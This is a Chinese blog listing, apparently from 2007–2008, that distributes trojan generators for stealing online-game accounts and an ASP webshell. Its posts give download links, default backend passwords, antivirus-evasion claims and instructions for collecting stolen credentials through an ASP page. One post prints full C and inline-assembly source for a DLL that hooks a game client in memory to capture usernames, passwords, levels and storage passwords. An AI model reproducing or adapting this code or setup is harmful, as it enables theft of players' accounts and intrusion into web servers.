popphen.net.ru
预览模式: 普通 | 列表

武林外传木马11.1更新

作者:天晴无名氏 日期:2008-11-01 10:55

 

武林外传木马08年11月1日更新

本程序通过 封包拦截 技术将帐号密码截获,准确率100%  目前支持截取帐号,密码,大区,小区,人物名,等级,金钱,仓库密码,收集截取密保卡


此生成器要求必须有ASP空间的支持

将生成器中ASP的地址对应着空间中的地址填入

例如http://www.xxx.com/Mail.asp

配置好ASP之后,生成木马,运行木马后登陆游戏,完全进入游戏之后,

[阅读全文]

类别: Soft | 引用: 0 | 评论: 0 | 阅读: 58

梦幻木马生成器(可以收信)

作者:天晴无名氏 日期:2008-10-16 18:56

测试可以收信的游戏木马,使用方法我就不多说了
 

[阅读全文]

类别: Soft | 引用: 0 | 评论: 0 | 阅读: 122

天龙八部木马核心代码

作者:天晴无名氏 日期:2008-09-27 23:23

截取了用户名,密码,等级,仓库密码
CODE:
#include <windows.h> BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; BYTE oldStoreCode[6]={0}; BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; DWORD ui_cegui; void *lpUserRet=NULL; void  *lpGradeRet=NULL; void  *lpStoreRet=NULL; char user[40]; char pass[40]; char storePassWord[40]; DWORD dwGrade; DWORD stroePath=0; void _stdcall StroeUnhook(); void _stdcall HookStroe(); DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); *lpModule=(DWORD)newModule; memcpy(newModule,(void*)hModule,imageSize); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)((DWORD)newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void <!--more-->**lpRet,DWORD newModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)(newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } void _stdcall GetUserBuff(char *userName,char *passWord) { strcpy(user,userName); strcpy(pass,passWord); return; } __declspec(naked)void GetUserAndPass() { _asm { push eax; mov eax,dword ptr ss:[ebp+0xC]; push eax; push ecx; call GetUserBuff; call StroeUnhook; pop eax; jmp [lpUserRet]; } } void _stdcall GetGradeDword(DWORD grade) { dwGrade=grade; return; } __declspec(naked)void GetGrade() { _asm { pushad; push ebx; call GetGradeDword; call HookStroe; popad; jmp [lpGradeRet]; } } void _stdcall StroeUnhook() { if(stroePath==0) return; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,oldStoreCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void _stdcall GetStoreBuff(char *storePass) { strcpy(storePassWord,storePass); char data[256]; wsprintf(data,\"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n\",user,pass,dwGrade,storePassWord); ::MessageBox(NULL,data,\"ok\",0); } __declspec(naked)void GetStore() { _asm { pushad; push ecx; call GetStoreBuff; call StroeUnhook; popad; jmp [lpStoreRet]; } } void _stdcall HookStroe() { stroePath=GetRealFlag(storeCode,\"ui_cegui.dll\",9,&lpStoreRet,ui_cegui); if(stroePath==0) return ; stroePath=stroePath+0x43; lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); *(DWORD*)(&storeJmpCode[1])=jmpAddress; memcpy(oldStoreCode,(BYTE*)stroePath,6); MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,storeJmpCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void HookGrade() { DWORD passPath=CmpFlag(gradeCode,\"ui_cegui.dll\",6,&lpGradeRet,&ui_cegui); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetGrade-(passPath+5); *(DWORD*)(&gradeJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,gradeJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } void HookUserAndPass() { DWORD hModule; DWORD passPath=CmpFlag(userCode,\"game.exe\",7,&lpUserRet,&hModule); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5); *(DWORD*)(&userJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,userJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } DWORD WINAPI Thread(LPVOID lpParam) { HookUserAndPass(); HookGrade(); return 0; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DWORD ThreadId; CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId); break; } default:break; } return TRUE; }

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 120

神话奥运梦幻木马生成器

作者:天晴无名氏 日期:2008-09-27 23:12


声明:本程序仅为提高游戏玩家的安全意识,如果将本程序用于非法用途,后果自负!

神话庆奥运梦幻木马生成器是目前唯一可用的免费梦幻木马生成器,功能没有任何限制!可以准确的截取准确截取大区、服务器、帐号、密码、仓库密码、角色名、等级、金钱、元宝!asp收信文件默认帐号 admin 密码admin888,如果要修改默认的数据库名称,请将config.asp里的数据库名称也修改了。

[阅读全文]

类别: Soft | 引用: 0 | 评论: 0 | 阅读: 129

楠楠梦幻木马

作者:天晴无名氏 日期:2008-09-07 00:03


软件加大了,免杀效果,可在任务管理中隐藏木马运行,请大家放心使用,本软件无插件,无后门,
说明下  软件更新 的时候编的时候出了点问题。不好意思大家,我会尽量修改的,另外我在说下 ;
需要更新的时候请用附带的捆绑工具把软件捆绑下,可以做到将军令过滤还可以免杀点。。
是麻烦了点 所以请大家将究下...
后台登陆
帐号admin 
密码admin888

下载文件楠楠梦幻木马.zip (2.78 MB , 下载:11次)

标签: 梦幻 木马
类别: Soft | 引用: 0 | 评论: 0 | 阅读: 158

黑吧专版ASP木马

作者:天晴无名氏 日期:2008-05-02 13:29

界面完全仿黑客动画吧首页模式
免杀过全世界杀毒软件
Serv-u通杀所有版本
Alexa排名查询
增加用户 可直接从服务器以SYSTEM权限建立用户
整站打包功能加以提速
直接下载,可直接从网站下载文件到WEBSHELL

默认密码为:hack58

本文件由网友发布,请自行解密测试后门
 
下载地址:
thunder://QUFodHRwOi8vZHh4ejIwLmhhY2s1OC5jb206

[阅读全文]

类别: Soft | 引用: 0 | 评论: 0 | 阅读: 238

从ACDSee的漏洞看木马入侵新思路

作者:天晴无名氏 日期:2008-04-29 23:02

来源:中关村在线

对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。

    本次提到的漏洞

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 172

二行代码解决全部网页木马(含iframe/script木马)

作者:天晴无名氏 日期:2008-04-10 19:25

作者:vickeychen
来源:经典论坛

还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,
我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。

前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》
得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,
现在流行挂<script&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 320

梦幻西游木马生成器最新版

作者:天晴无名氏 日期:2007-11-19 00:43



梦幻西游木马生成器最新版

效果自测.后门自测.

真#了 过nod32 不过瑞星 免杀自做.


下载地址: http://www.live-share.com/files/288690/memhuanmumazuixinban.rar.html

类别: Soft | 引用: 0 | 评论: 0 | 阅读: 633

07/11/15更新版 网游猎手(26 in 1)网络游戏木马生成器

作者:天晴无名氏 日期:2007-11-16 10:06


07/11/15更新
8款游戏更新截不到密码的问题已解决
服务端被杀做出的更新过世界主流杀软

此木马可截取生成器上能已加上的游戏的信息包括(区、服务器、帐号、密码、等级、金钱,仓库金钱,仓库密码或者装备锁)

不再支持邮箱收信.邮箱收信将会比网页收信多无用信息,以致于一个账号多次发送.
如果您不懂如何用空间收信,请您在黑吧上下载动画教程,
动画教程下载地址: http://www.hack58.ne

[阅读全文]

类别: Soft | 引用: 0 | 评论: 1 | 阅读: 378